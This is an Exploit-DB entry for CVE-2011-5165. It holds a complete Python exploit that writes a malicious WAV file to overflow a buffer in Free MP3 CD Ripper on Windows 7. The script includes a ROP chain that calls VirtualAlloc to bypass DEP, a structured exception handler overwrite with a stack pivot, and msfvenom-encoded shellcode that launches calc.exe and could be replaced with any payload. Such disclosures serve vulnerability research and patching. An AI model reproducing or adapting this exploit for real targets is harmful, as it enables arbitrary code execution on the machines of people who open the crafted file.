Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)

EDB-ID:

36827

CVE:

2011-5165

EDB Verified:

Author:

naxxo

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2015-04-24

Vulnerable App: 
#!/usr/bin/python

# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe

# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)


import struct

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x004103fe,  # POP EAX # RETN [fcrip.exe] 
      0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
      0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 
      0x00446c97,  # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 
      0x41414141,  # Filler (compensate)
      0x6f4811f8,  # POP EBP # RETN [vorbisfile.dll] 
      0x1000c5ce,  # & push esp # ret  [libFLAC.dll]
      0x00415bfb,  # POP EBX # RETN [fcrip.exe] 
      0x00000001,  # 0x00000001-> ebx
      0x00415828,  # POP EDX # RETN [fcrip.exe] 
      0x00001000,  # 0x00001000-> edx
      0x10005f62,  # POP ECX # RETN [libFLAC.dll] 
      0x00000040,  # 0x00000040-> ecx
      0x00409967,  # POP EDI # RETN [fcrip.exe] 
      0x00412427,  # RETN (ROP NOP) [fcrip.exe]
      0x00494277,  # POP EAX # RETN [fcrip.exe] 
      0x90909090,  # nop
      0x004c8dc0,  # PUSHAD # RETN [fcrip.exe] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode =  ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"



junk = "A" * 3812
junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode

seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}
 

buffer = junk + seh + "\x90" * 800


file = "poc.wav"
f=open(file,"w")
f.write(buffer);
f.close();
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services